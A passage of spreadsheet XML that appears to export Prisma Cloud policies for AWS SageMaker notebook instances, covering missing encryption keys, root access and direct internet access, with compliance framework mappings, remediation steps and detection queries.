          <t>f63b99e7-f844-4873-8292-61c7159f73d1</t>
        </is>
      </c>
      <c r="AI2114" t="inlineStr">
        <is>
          <t>30fef5fe-8615-40a8-a1bb-aa8b2eb0f830</t>
        </is>
      </c>
      <c r="AJ2114" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2114" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2115">
      <c r="A2115" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Korea – Information Security Management System (ISMS), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], SOC 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, NIST CSF v2.0, Telecommunications Security Act - TSA, ISO/IEC 27018:2019, CRI Profile v2.0, MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MAS TRM 2021, ISO/IEC 27002:2013, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, Brazilian Data Protection Law (LGPD), CRI Profile v1.2.1, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2115" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2115" s="2" t="inlineStr"/>
      <c r="D2115" t="inlineStr"/>
      <c r="E2115" t="inlineStr"/>
      <c r="F2115" t="inlineStr"/>
      <c r="G2115" t="b">
        <v>0</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2115" t="inlineStr">
        <is>
          <t>aws-sagemaker</t>
        </is>
      </c>
      <c r="K2115" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L2115" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2115" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2115" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2115" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2115" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2115" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2115" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2115" t="inlineStr"/>
      <c r="T2115" t="b">
        <v>0</v>
      </c>
      <c r="U2115" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2115" t="inlineStr">
        <is>
          <t>aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W2115" t="inlineStr">
        <is>
          <t>This policy identifies SageMaker notebook instances that are not encrypted using Customer Managed Key. SageMaker notebook instances should be encrypted with Amazon KMS Customer Master Keys (CMKs) instead of AWS managed-keys in order to have more granular control over the data-at-rest encryption/decryption process and meet compliance requirements.
For more details:
https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html</t>
        </is>
      </c>
      <c r="X2115" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance encryption can not be modified once it is created. You need to create a new notebook instance with encryption using a custom KMS key; migrate all required data from the reported notebook instance to the newly created notebook instance before you delete the reported notebook instance.
To create a New AWS SageMaker notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and then choose 'Create notebook instance'
4. On the Create notebook instance page, within the 'Permissions and encryption' section,
From the 'Encryption key - optional' dropdown list, choose a custom KMS key for the new SageMaker notebook instance.
5. Choose other parameters as per your requirement and click on the 'Create notebook instance' button
To delete reported notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and Choose the reported notebook instance
4. Click on the 'Actions' dropdown menu, select the 'Stop' option, and when instance stops, select the 'Delete' option.
5. Within Delete &lt;notebook-instance-name&gt; dialog box, click the Delete button to confirm the action.</t>
        </is>
      </c>
      <c r="Y2115" t="inlineStr"/>
      <c r="Z2115" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-sagemaker-notebook-instance' AND json.rule = notebookInstanceStatus equals InService and kmsKeyId exists as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '$.X.kmsKeyId equals $.Y.key.keyArn and $.Y.keyMetadata.keyManager contains AWS'; show X;</t>
        </is>
      </c>
      <c r="AA2115" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2115" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2115" t="inlineStr">
        <is>
          <t>PC-AWS-SGM-561</t>
        </is>
      </c>
      <c r="AD2115" t="b">
        <v>1</v>
      </c>
      <c r="AE2115" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2115" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>cf7274bc-24ec-443a-8d2e-01835a27f879</t>
        </is>
      </c>
      <c r="AI2115" t="inlineStr">
        <is>
          <t>0afd7ae2-a3c7-4529-8623-2b88b0e94ce0</t>
        </is>
      </c>
      <c r="AJ2115" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2115" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2116">
      <c r="A2116" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, NIST CSF v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, ITSG-33, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, CSA CCM v.4.0.1, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, TX-RAMP Level 2, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2116" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2116" s="2" t="inlineStr"/>
      <c r="D2116" t="inlineStr"/>
      <c r="E2116" t="inlineStr"/>
      <c r="F2116" t="inlineStr"/>
      <c r="G2116" t="b">
        <v>1</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2116" t="inlineStr">
        <is>
          <t>aws-sagemaker</t>
        </is>
      </c>
      <c r="K2116" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance with root access enabled</t>
        </is>
      </c>
      <c r="L2116" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2116" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2116" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2116" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2116" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2116" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2116" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2116" t="inlineStr"/>
      <c r="T2116" t="b">
        <v>0</v>
      </c>
      <c r="U2116" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2116" t="inlineStr">
        <is>
          <t>aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W2116" t="inlineStr">
        <is>
          <t>This policy identifies the SageMaker notebook instances which are enabled with root access. Root access means having administrator privileges, users with root access can access and edit all files on the compute instance, including system-critical files. Removing root access prevents notebook users from deleting system-level software, installing new software, and modifying essential environment components.
NOTE: Lifecycle configurations need root access to be able to set up a notebook instance. Because of this, lifecycle configurations associated with a notebook instance always run with root access even if you disable root access for users.
For more details:
https://docs.aws.amazon.com/sagemaker/latest/dg/nbi-root-access.html</t>
        </is>
      </c>
      <c r="X2116" t="inlineStr">
        <is>
          <t>1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances (Left panel)
4. Click on the reported SageMaker notebook instance
Note: To update root access for SageMaker notebook instances; Instances need to be stopped. So stop running instance before editing.
5. In the 'Notebook instance settings' section, click on 'Edit'
6. On the Edit notebook instance page, within the 'Permissions and encryption' section,
From the 'Root access - optional' options, select 'Disable - Don't give users root access to the notebook'
7. Click on the 'Update notebook instance' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-307
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-307</t>
        </is>
      </c>
      <c r="Y2116" t="inlineStr"/>
      <c r="Z2116" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sagemaker-notebook-instance' AND json.rule = notebookInstanceStatus equals InService and rootAccess equals Enabled and notebookInstanceLifecycleConfigName does not exist
{"category":"General","resourceTypes":["aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA2116" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2116" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2116" t="inlineStr">
        <is>
          <t>PC-AWS-SGM-664-CKV_AWS_307</t>
        </is>
      </c>
      <c r="AD2116" t="b">
        <v>1</v>
      </c>
      <c r="AE2116" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2116" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>4a38048f-b657-4bcc-b926-aba812bdf66e</t>
        </is>
      </c>
      <c r="AI2116" t="inlineStr">
        <is>
          <t>a701f33c-1c37-45d3-a5a2-4ef4126c618a</t>
        </is>
      </c>
      <c r="AJ2116" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2116" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2117">
      <c r="A2117" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v10.0 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, MAS TRM 2021, MAS TRM 2021, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Matt's ATT&amp;ACK, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), Telecommunications Security Act - TSA, CIS Controls v8, NIST 800-53 Rev 5, SOC 2, NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2117" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2117" s="2" t="inlineStr"/>
      <c r="D2117" t="inlineStr"/>
      <c r="E2117" t="inlineStr"/>
      <c r="F2117" t="inlineStr"/>
      <c r="G2117" t="b">
        <v>1</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2117" t="inlineStr">
        <is>
          <t>aws-sagemaker</t>
        </is>
      </c>
      <c r="K2117" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance configured with direct internet access feature</t>
        </is>
      </c>
      <c r="L2117" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2117" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2117" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2117" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2117" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2117" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2117" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2117" t="inlineStr"/>
      <c r="T2117" t="b">
        <v>0</v>
      </c>
      <c r="U2117" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2117" t="inlineStr">
        <is>
          <t>aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W2117" t="inlineStr">
        <is>
          <t>This policy identifies SageMaker notebook instances that are configured with direct internet access feature. If AWS SageMaker notebook instances are configured with direct internet access feature, any machine outside the VPC can establish a connection to these instances, which provides an additional avenue for unauthorized access to data and the opportunity for malicious activity.
For more details:
https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html</t>
        </is>
      </c>
      <c r="X2117" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance direct internet access feature can not be disabled; once it is created. You need to create a new notebook instance with disabled direct internet access feature; and migrate all required data from the reported notebook instance to the newly created notebook instance before you delete the reported notebook instance.
To create a New AWS SageMaker notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and then choose 'Create notebook instance'
4. On the Create notebook instance page, within the 'Network' section, 
From 'VPC – optional' dropdown list, select the VPC where you want to deploy a new SageMaker notebook instance.
5. Select the 'Disable - Access the internet through a VPC' button under the 'Direct internet access' to disable direct internet access for the new notebook instance.
6. Choose other parameters as per your requirement and Click on the 'Create notebook instance' button
To delete reported notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and Choose the reported notebook instance
4. Click on the 'Actions' dropdown menu, select the 'Stop' option, and when instance stops, select the 'Delete' option.
5. Within Delete &lt;notebook-instance-name&gt; dialog box, click the Delete button to confirm the action. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="Y2117" t="inlineStr"/>
      <c r="Z2117" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sagemaker-notebook-instance' AND json.rule = 'notebookInstanceStatus equals InService and directInternetAccess equals Enabled'
{"category":"Networking","resourceTypes":["aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA2117" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2117" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2117" t="inlineStr">
        <is>
          <t>PC-AWS-SGM-553-CKV_AWS_122</t>
        </is>
      </c>
      <c r="AD2117" t="b">
        <v>1</v>
      </c>
      <c r="AE2117" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2117" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>5c0ba8b1-9b88-486f-9fe1-a0eb9071a42b</t>
        </is>
      </c>
      <c r="AI2117" t="inlineStr">
        <is>
          <t>f7743e85-4180-44d9-b383-d45821eb0d90</t>
        </is>
      </c>
      <c r="AJ2117" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2117" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2118">
      <c r="A2118" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v4.0.12, Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, MLPS 2.0 (Level 2), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, ISO/IEC 27017:2015, GDPR, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, ITSG-33, Risk Management in Technology (RMiT), ISO/IEC 27018:2019, MAS TRM 2021, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, HIPAA, FFIEC, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MAS TRM 2021, ISO/IEC 27002:2013, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2118" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2118" s="2" t="inlineStr"/>
      <c r="D2118" t="n">
        <v>3</v>
      </c>
      <c r="E2118" t="n">
        <v>0</v>
      </c>
      <c r="F2118" t="n">
        <v>0</v>
      </c>
      <c r="G2118" t="b">
        <v>1</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2118" t="inlineStr">
        <is>
          <t>aws-sagemaker</t>
        </is>
      </c>
      <c r="K2118" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance not configured with data encryption at rest using KMS key</t>
        </is>
      </c>
      <c r="L2118" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2118" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2118" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2118" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2118" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2118" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2118" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2118" t="inlineStr"/>
      <c r="T2118" t="b">
        <v>0</v>
      </c>
      <c r="U2118" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2118" t="inlineStr">
        <is>
          <t>aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W2118" t="inlineStr">
        <is>
          <t>This policy identifies SageMaker notebook instances that are not configured with data encryption at rest using the AWS managed KMS key. It is recommended to implement encryption at rest in order to protect data from unauthorized entities.
For more details:
https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html</t>
        </is>
      </c>
      <c r="X2118" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance can not be configured with data encryption at rest once it is created. You need to create a new notebook instance with encryption at rest using the KMS key; migrate all required data from the reported notebook instance to the newly created notebook instance before you delete the reported notebook instance.
To create a New AWS SageMaker notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and then choose 'Create notebook instance'
4. On the Create notebook instance page, From the 'Permissions and encryption' section, 
select the KMS key from the 'Encryption key - optional' dropdown list. If no KMS keys already, you have to create a KMS key first.
5. Choose other parameters as per your requirement and click on the 'Create notebook instance' button
To delete reported notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and Choose the reported notebook instance
4. Click on the 'Actions' dropdown menu and, select the 'Stop' option, and when instance stops, select the 'Delete' option.
5. Within Delete &lt;notebook-instance-name&gt; dialog box, click the Delete button to confirm the action. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-14
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-14</t>
        </is>
      </c>
      <c r="Y2118" t="inlineStr"/>
      <c r="Z2118" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sagemaker-notebook-instance' AND json.rule = 'notebookInstanceStatus equals InService and kmsKeyId does not exist'
{"category":"General","resourceTypes":["aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA2118" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2118" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2118" t="inlineStr">
        <is>
          <t>PC-AWS-SGM-554-CKV_AWS_22</t>
        </is>
      </c>
      <c r="AD2118" t="b">
        <v>1</v>
      </c>
      <c r="AE2118" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2118" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>f2c2c424-6fc9-4f99-8efb-4cb09810be97</t>
        </is>
      </c>
      <c r="AI2118" t="inlineStr">
        <is>
          <t>99872307-ffae-4bc9-8b7b-17597c4054bf</t>
        </is>
      </c>
      <c r="AJ2118" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2118" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2119">
      <c r="A2119" t="inlineStr"/>
